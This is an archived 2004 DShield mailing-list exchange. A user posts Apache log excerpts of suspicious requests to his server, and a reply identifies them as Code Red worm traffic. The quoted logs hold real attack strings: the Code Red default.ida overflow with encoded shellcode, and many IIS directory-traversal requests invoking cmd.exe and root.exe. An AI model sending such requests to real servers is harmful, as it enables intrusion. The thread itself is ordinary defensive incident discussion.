[Dshield] Suspect HTTP-activity

Bruyere, Michel mbruyere at ezemcanada.com
Fri Jan 23 20:30:19 GMT 2004


It seems to be code Red or code red II requests


Try a search on google with
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX

You'll find many threads talking about it... An old one that seems to get
back...

M.Bruyere


> -----Original Message-----
> From: Martin Agren [mailto:martin.agren at home.se]
> Sent: vendredi 23 janvier 2004 13:31
> To: list at dshield.org
> Subject: [Dshield] Suspect HTTP-activity
> 
> Hello,
> I'm a fresh subscriber to this list and the very reason I stumbled upon
> it was that I was investigating some activity that apache logged and
> that made me a little supicious about the intentions behind the
> requests. So first of, Hello!
> 
> I've been trying to go through the most recent archives and while what
> you discuss seems to be both interesting and important, I haven't found
> anything that match my query.
> 
> If this is the wrong place for my question, I can take pointers to other
> lists/sites for an answer. :-)
> 
> Below are excerpts from my apache/access.log (I'm running Win2000Pro). I
> haven't publicly announced my web-server in any way -- I just use it for
> development of web-code and invite other developers to check it out.
> 
> Most of these logs seems to indicate nothing actually happened
> (404-status), but I'm curious as to what it's all about and if anyone
> might be interested in this information. Any DShield-like service that
> collects apache-logs? ;-)
> 
> Most of these requests seems to be someone wanting to list my disk.
> 
> Are there any known worms that create these requests? Should I act in
> any way?
> 
> Any help is much appreciated!
> 
> If anyone wants me to post more logs, I can do so (it's basically just
> the same requests a couple of times)
> 
> Martin
> 
> 218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET
>
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
>
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 308
> 127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1"
> 404 320
> 210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET
> /scripts/nsiislog.dll" 404 -
> 202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200
> 1916
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 307
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
> ystem32/cmd.exe?/c+dir
> HTTP/1.0" 404 362
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list